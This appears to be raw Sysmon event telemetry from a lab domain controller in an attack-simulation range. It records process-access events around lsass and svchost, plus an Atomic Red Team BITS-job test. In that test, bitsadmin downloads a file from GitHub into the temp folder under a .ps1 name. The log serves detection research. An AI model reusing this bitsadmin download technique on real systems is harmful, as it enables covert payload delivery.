16:33:11.166{7F8C56E7-4E3B-6063-0B00-00000000AF01}628668C:\Windows\system32\lsass.exe{7F8C56E7-4E3C-6063-1600-00000000AF01}1280C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+304a5|C:\Windows\system32\lsasrv.dll+2e33b|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001061754Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.150{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E3C-6063-1600-00000000AF01}1280C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061753Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.150{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E3C-6063-1600-00000000AF01}1280C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061752Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.150{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E3C-6063-1600-00000000AF01}1280C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061751Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.150{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E3C-6063-1600-00000000AF01}1280C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061750Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.150{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E3C-6063-1600-00000000AF01}1280C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061749Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.150{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E3B-6063-0B00-00000000AF01}628C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061748Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.150{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E3B-6063-0B00-00000000AF01}628C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061747Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.150{7F8C56E7-4E3B-6063-0B00-00000000AF01}628668C:\Windows\system32\lsass.exe{7F8C56E7-4E3C-6063-1600-00000000AF01}1280C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061746Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.150{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E3B-6063-0B00-00000000AF01}628C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061745Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.150{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E3B-6063-0B00-00000000AF01}628C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061744Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.150{7F8C56E7-4E3B-6063-0B00-00000000AF01}628668C:\Windows\system32\lsass.exe{7F8C56E7-4E3C-6063-1600-00000000AF01}1280C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000001061743Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-SetValue2021-03-30 16:33:11.134{7F8C56E7-4E3C-6063-1600-00000000AF01}1280C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BITS\Performance\PerfMMFileNameGlobal\MMF_BITS2b9c34db-e0d5-4ca4-8087-c760caa7d697 10341000x80000000000000001061742Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.103{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-52C7-6063-4101-00000000AF01}2956C:\Windows\system32\bitsadmin.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061741Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.103{7F8C56E7-4E3C-6063-1600-00000000AF01}12801852C:\Windows\system32\svchost.exe{7F8C56E7-52C7-6063-4101-00000000AF01}2956C:\Windows\system32\bitsadmin.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061740Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.103{7F8C56E7-4E3C-6063-1600-00000000AF01}12801320C:\Windows\system32\svchost.exe{7F8C56E7-52C7-6063-4101-00000000AF01}2956C:\Windows\system32\bitsadmin.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061739Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.087{7F8C56E7-4F87-6063-CA00-00000000AF01}55846056C:\Windows\system32\conhost.exe{7F8C56E7-52C7-6063-4101-00000000AF01}2956C:\Windows\system32\bitsadmin.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061738Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.087{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061737Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.087{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061736Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.087{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061735Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.087{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061734Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.087{7F8C56E7-4E4F-6063-5500-00000000AF01}38243840C:\Windows\system32\csrss.exe{7F8C56E7-52C7-6063-4101-00000000AF01}2956C:\Windows\system32\bitsadmin.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001061733Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.087{7F8C56E7-52C7-6063-4001-00000000AF01}60083408C:\Windows\system32\cmd.exe{7F8C56E7-52C7-6063-4101-00000000AF01}2956C:\Windows\system32\bitsadmin.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001061732Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.087{7F8C56E7-52C7-6063-4101-00000000AF01}2956C:\Windows\System32\bitsadmin.exe7.8.14393.0 (rs1_release.160715-1616)BITS administration utilityMicrosoft® Windows® Operating SystemMicrosoft Corporationbitsadmin.exebitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Users\ADMINI~1\AppData\Local\Temp\bitsadmin1_flag.ps1 C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{7F8C56E7-4E65-6063-912A-070000000000}0x72a912HighMD5=F548717B821860C2B2242367732FE105,SHA256=E1057A20945BCE8F00C0BE5E3DB40C4A98AB33F42F4D2DF919AEDB0EF6651D6E,IMPHASH=CE0EB5030AA7D3C8606F11BBCA0BC912{7F8C56E7-52C7-6063-4001-00000000AF01}6008C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md %temp%\bitsadmin1_flag.ps1" 10341000x80000000000000001061731Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.072{7F8C56E7-4F87-6063-C900-00000000AF01}56526096C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{7F8C56E7-52C7-6063-4001-00000000AF01}6008C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c01f5|UNKNOWN(00007FFA71EB3F13) 10341000x80000000000000001061730Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.072{7F8C56E7-4F87-6063-CA00-00000000AF01}55846056C:\Windows\system32\conhost.exe{7F8C56E7-52C7-6063-4001-00000000AF01}6008C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061729Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.072{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061728Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 